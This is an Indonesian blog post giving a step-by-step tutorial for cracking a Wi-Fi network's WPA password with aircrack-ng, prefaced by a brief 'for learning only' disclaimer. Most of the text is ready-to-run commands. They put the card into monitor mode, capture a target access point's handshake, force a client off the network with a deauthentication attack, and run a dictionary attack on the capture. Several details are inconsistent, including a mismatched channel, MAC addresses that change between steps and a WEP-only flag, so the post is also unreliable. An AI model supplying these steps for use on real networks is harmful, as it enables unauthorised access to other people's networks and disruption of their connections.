Pages

Subscribe:

Jumat, 13 Juli 2012

Teknik Menjebol WPA


Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya
di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk
digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang
melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini &
harus berharapan sendiri dengan aparat penegak hukum.
Menjebol WPA hampir tidak mungkin. Tapi kalau anda mau memaksa mencoba-nya bisa
mencoba langkah berikut walaupun tidak ada jaminan sama sekali bahwa anda dapat
menjebol-nya.
Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC
address WLAN kita, dan (3) Channel yang digunakan AP.

Misalnya,

BSSID 00:30:4F:4E:2B:50 
WIFI 00:11:6b:33:d3:90 
CHANNEL 2 



Untuk memudahkan operasi ada baiknya melakukan di shell


export AP=00:30:4F:4E:2B:50 
export WIFI=00:11:6b:33:d3:90 
export CHANNEL=1 

Setup supaya interface WiFi masuk ke mode monitoring menggunakan perintah

airmon-ng start wlan0 1

Biasanya akan tampil kira-kira sebagai berikut,

Interface Chipset Driver 
wlan0 Intel 3945ABG iwl3945 - [phy0] 
                              (monitor mode enabled on mon0) 

Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalah
mon0. Kita harus menggunakan interface mon0 untuk melakukan monitor.

Jalankan airodump di WLAN mon0

airodump-ng -w hasilcapture --bssid $AP --channel $CHANNEL mon0 

Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah

airodump-ng --output-format pcap -w hasilcapture --bssid $AP --channel $CHANNEL mon0 

Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..
Untuk mempercepat proses gunakan aireplay-ng


aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0 

Dimana

-a MAC AP 
-c MAC client 

Kunci dari proses cracking WPA adalah ketersediaan kamus silahkan di cek ke

http://www.aircrack-ng.org/doku.php?id=faq
http://www.aircrack-ng.org/doku.php?id=faq#how_can_i_crack_a_wpa-psk_network
http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists

Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture.

Jalankan aircrack untuk mengcrack WPA

# aircrack-ng -w kamuspass.txt -b 00:14:6C:7E:40:80 psk*.cap 
-b MAC BSSID 

Versi yang lebih panjang


# aircrack-ng -a 2 -e essidapyangakandicrack -n 64 hasilcapture* -w kamuspass.txt 
# aircrack-ng -a 2 -e linksys -n 64 hasilcapture* -w kamuspass.txt 
# aircrack-ng -a 2 -e $AP -n 64 hasilcapture* -w kamuspass.txt

Bisa juga menggunakan perintah


# aircrack-ng -a 2 -n 64 hasilcapture* -w kamuspass.txt 

Switch -a 2 digunakan untuk menset aircrack-ng agar meng-crack WPA.



0 komentar:

Posting Komentar